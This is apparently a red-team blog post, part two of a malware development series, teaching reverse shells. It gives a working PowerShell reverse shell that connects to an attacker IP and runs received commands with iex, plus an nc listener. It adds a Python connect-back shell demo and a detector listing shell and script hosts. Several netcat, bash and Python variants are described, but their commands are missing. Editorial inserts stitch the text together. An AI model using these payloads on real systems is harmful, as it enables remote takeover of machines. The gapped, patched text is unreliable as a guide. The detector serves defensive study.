Malware Development : Part-2

RED TEAM
5 min read · Mar 11, 2024


“Infected Innovation: The Malware Mastermind”

What is Malware Development ?

Whether you specialize in Red Team or Blue Team operations, gaining expertise in malware development techniques and tactics offers a holistic understanding of advanced attack strategies. Since most malware targets Windows, learning to develop it gives you valuable skills in Windows programming.

Most of the tutorials in this series require an intermediate-level understanding of the C/C++ programming languages.

Malware Development Tricks and Techniques

Reverse Shells

Reverse shells are a fundamental building block in malware development: they are how an implant hands control of the infected host back to the operator.

Attacker: nc -lvnp 443


nc: This is the Netcat command.
-l: It makes Netcat listen for incoming connections.
-v: It enables verbose mode, providing more detailed output.
-n: It tells Netcat not to resolve hostnames.
-p 443: It specifies the port number to listen on.
Victim:

# Connect back to the attacker's listener (replace the IP and port with your own)
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.15', 443)
$stream = $client.GetStream()
$encoding = [System.Text.Encoding]::UTF8

while ($true) {
    $bytes = New-Object byte[] 4096
    $length = $stream.Read($bytes, 0, $bytes.Length)
    if ($length -le 0) { break }   # listener closed the connection

    # Decode the received command and run it. Out-String flattens the result
    # (which may be an array of objects) into one string with newlines, so
    # GetBytes always receives a string and the attacker sees formatted output.
    $data = $encoding.GetString($bytes, 0, $length)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback += 'PS ' + (Get-Location).Path + '> '
    $sendbackBytes = $encoding.GetBytes($sendback)
    $stream.Write($sendbackBytes, 0, $sendbackBytes.Length)
    $stream.Flush()
}
$client.Close()

Note: switch the network adapter of both virtual machines (Linux and Windows) from NAT to Bridged Adapter so that the Windows victim can reach the Linux listener directly.

What is a reverse shell?

A reverse shell, often called a connect-back shell, is a remote shell initiated from the target: the target connects back to the attacker's machine and exposes its shell there. It is usually used during exploitation to gain control of the remote machine.

Reverse shells are a common tactic employed by red teamers and pentesters when a firewall blocks inbound connections to the target. By connecting out over ports that are usually allowed outbound, such as 80, 443 or 8080, they bypass those restrictions. The trade-off is that the connection exposes the attacker's control server: the outbound session is visible to network security monitoring, and the process that opened it is visible to endpoint telemetry.
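What "susceptible to detection" looks like in practice, as an added example that is not from the original post or from the book it credits: a small detector run over constructed records that use Sysmon Event ID 3 (network connection) field names. The process lists, path patterns and the uncommon-port rule are assumptions a defender would tune for their own environment, and the sample events are constructed, not real telemetry. The second record mirrors the PowerShell payload above (powershell.exe connecting out to 192.168.1.15:443).

```python
# Added example (not from the original post): reverse-shell heuristics run over
# constructed Sysmon Event ID 3 style records. Process lists, path patterns and
# the uncommon-port rule are assumptions to tune per environment.

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe"}
WEB_PORTS = {80, 443, 8080}
COMMON_SERVICE_PORTS = WEB_PORTS | {21, 22, 25, 53, 88, 135, 139, 389, 445,
                                    587, 636, 3389, 5985, 5986}
# Directories a normal user can write to; binaries launched from here deserve scrutiny.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")

# Constructed sample events (not real telemetry). "Initiated" is True for outbound.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "142.250.74.46", "DestinationPort": 443, "Initiated": True},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationIp": "192.168.1.15", "DestinationPort": 443, "Initiated": True},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 135, "Initiated": False},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\invoice.exe",
     "DestinationIp": "203.0.113.9", "DestinationPort": 8080, "Initiated": True},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "DestinationIp": "192.168.1.15", "DestinationPort": 4444, "Initiated": True},
]


def basename(image):
    """Last path component of a Windows image path, lower-cased."""
    return image.rsplit("\\", 1)[-1].lower()


def reasons_for(event):
    """Return the list of rules this connection trips (empty list = not flagged)."""
    if not event["Initiated"]:          # only outbound (connect-back) traffic matters here
        return []
    proc = basename(event["Image"])
    path = event["Image"].lower()
    port = event["DestinationPort"]
    hits = []
    # Rule 1: shells and script hosts rarely open sockets themselves.
    if proc in SCRIPT_HOSTS:
        hits.append("script host or shell initiated an outbound connection")
    # Rule 2: a non-browser binary in a user-writable location using a web port
    # is the "blend into 443" pattern the text describes.
    if port in WEB_PORTS and proc not in BROWSERS and any(d in path for d in USER_WRITABLE):
        hits.append("non-browser binary in a user-writable path talking to a web port")
    # Rule 3: outbound to an uncommon high port (e.g. 4444) is the noisy variant.
    if port >= 1024 and port not in COMMON_SERVICE_PORTS:
        hits.append(f"outbound to uncommon high port {port}")
    return hits


def detect(events):
    """Return (process, destination ip, destination port, reasons) for flagged events."""
    return [(basename(e["Image"]), e["DestinationIp"], e["DestinationPort"], r)
            for e in events if (r := reasons_for(e))]


if __name__ == "__main__":
    for proc, ip, port, reasons in detect(SAMPLE_EVENTS):
        print(f"{proc} -> {ip}:{port}")
        for reason in reasons:
            print("   ", reason)
```

Rule 3 will also flag legitimate software that talks on non-standard ports, so in a real deployment it needs a per-host baseline; rules 1 and 2 are the ones that catch the PowerShell payload above even though it uses 443. Using a web port hides the port, not the process that opened the socket.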

The process typically involves three steps.

First, the attacker exploits a vulnerability in the target system or network that gives them the ability to execute code. Next, they set up a listener on their own machine. Finally, they use that code execution to launch a reverse shell payload on the target, which connects back to the listener and hands over a shell.

It’s important to recognize another potential risk: in real cyber attacks, reverse shells can also be obtained through social engineering tactics. For instance, malware distributed via phishing emails or malicious websites can initiate outgoing connections to a command server, providing hackers with reverse shell capabilities.

In summary, reverse shells offer a workaround for inbound firewall restrictions, but the outbound connection is visible to defenders, and the same connect-back mechanism is what phishing-delivered malware uses to reach its command server.

This post does not cover exploiting a vulnerability in the target host or network; it assumes you have already found one that can be leveraged for code execution, and shows what to run once you have it.

Depending on which operating system is installed on the victim and what services are running there, the reverse shell will differ: it may be PHP, Python, JSP, etc.

listener

For simplicity, in this example the victim allows outgoing connections on any port (the default iptables policy). In the Linux examples we use 4444 as the listener port (the PowerShell example above used 443); change it to whatever port you prefer. The listener can be any program or utility that can open TCP/UDP sockets. In most cases I use the nc (netcat) utility.

As before, the -l flag tells Netcat to listen for incoming connections, the -v flag enables verbose output, the -n flag prevents DNS resolution, and the -p flag specifies the port number.

run reverse shell (examples)

Again for simplicity, the target in these examples is a Linux machine.

1. netcat

run:

Attacker

where 192.168.1.15 is your attacker machine's IP and 4444 is the listening port.

Here, we successfully obtained the reverse shell.

2. netcat without -e

Newer Linux distributions ship a netcat built without GAPING_SECURITY_HOLE (or the OpenBSD netcat), which means you don't have the -e option that executes a program once the connection is made.

In this case, on the victim machine run:

Here, I first create a named pipe (also called a FIFO) named p using the mkfifo command. mkfifo creates a special file in the file system (ls -l shows it with type p, for named pipe), and here it serves as a "backpipe": the commands that nc receives from the attacker are written into the FIFO, a cat reading the FIFO feeds them to the shell's standard input, and the shell's output is piped back into nc. I created the backpipe in /tmp because pretty much any account is allowed to write there.

3. bash

This will not work on older Debian-based Linux distributions, whose bash was built without the /dev/tcp network redirections this technique relies on.

run:

4. python

To create a semi-interactive shell using python.

run:
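The three steps described earlier (set up a listener, connect back, execute commands) and the Python variant of this section can be run end to end on one machine. The following is an added example, not code from the original post or from the book it credits: both sides are implemented in Python and talk over localhost, with 127.0.0.1 standing in for the attacker's IP, an OS-assigned port instead of 4444, and the commands and the "$ " prompt delimiter being assumptions. The victim loop mirrors the PowerShell one above (read a line, execute it, send the output plus a prompt back). The classic Python one-liner instead dup2()s the socket onto stdin, stdout and stderr and execs /bin/sh -i, which gives a fully interactive shell but cannot be demonstrated in-process like this.

```python
import socket
import subprocess
import threading

# Added example (not from the original post): attacker listener and victim
# connect-back in one process over localhost. 127.0.0.1, the ephemeral port,
# the commands and the "$ " prompt delimiter are assumptions for the demo.
ATTACKER_HOST = "127.0.0.1"
EXIT_COMMAND = "exit"
PROMPT = "$ "


def recv_reply(conn):
    """Attacker side: read until the prompt the victim appends after each output."""
    buf = b""
    while not buf.endswith(PROMPT.encode()):
        chunk = conn.recv(4096)
        if not chunk:            # victim went away
            break
        buf += chunk
    return buf.decode(errors="replace")


def listener(srv, commands):
    """Attacker side (step 2): accept one connect-back, send commands, collect replies."""
    conn, _ = srv.accept()
    replies = []
    with conn:
        for cmd in commands:
            conn.sendall((cmd + "\n").encode())
            replies.append(recv_reply(conn))
        conn.sendall((EXIT_COMMAND + "\n").encode())
    return replies


def victim(host, port):
    """Victim side (step 3): connect back, run each received line, return output + prompt."""
    with socket.create_connection((host, port)) as s:
        for line in s.makefile("r"):          # line-oriented reads of attacker commands
            cmd = line.strip()
            if cmd == EXIT_COMMAND:
                break
            result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
            # Merge stderr into the reply, like "2>&1" in the PowerShell version.
            s.sendall((result.stdout + result.stderr + PROMPT).encode())


def run_exchange(commands):
    """Bind an ephemeral port, run both sides in-process, return the attacker's view."""
    srv = socket.socket()
    srv.bind((ATTACKER_HOST, 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    results = {}
    t = threading.Thread(target=lambda: results.update(replies=listener(srv, commands)))
    t.start()
    victim(ATTACKER_HOST, port)
    t.join()
    srv.close()
    return results["replies"]


if __name__ == "__main__":
    for reply in run_exchange(["echo hello from the target", "id"]):
        print(reply, end="")
```

The listener has no way to know when a command's output is finished other than the prompt delimiter the victim appends, which is exactly why the PowerShell payload above tacks "PS path> " onto every reply; on a raw nc listener you get the same effect by eye.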

I hope you understand the importance and concept of a reverse shell. It’s very important in the context of Malware Development.

Credit goes to : zhassulan zhussupov

From his book, I learned the concepts and analyzed them in detail. After doing all this, I apply those attack steps practically on my Linux and Windows systems, as you can see from the screenshots above, and I try to add my own additional information to the article.

I have no intention of stealing content from his book and presenting it as my own. The entire credit goes to him because I learned all these tricks and techniques from his book. Whatever concepts I learned from him, I will always apply them myself first on my computer before writing the blog.

Part-3 going to be more interesting.

I hope you like Part-2 : )


RED TEAM

I'm a 19-year-old malware developer with 1 year of experience. Passionate about learning new techniques, sharing knowledge, and creating malware tools.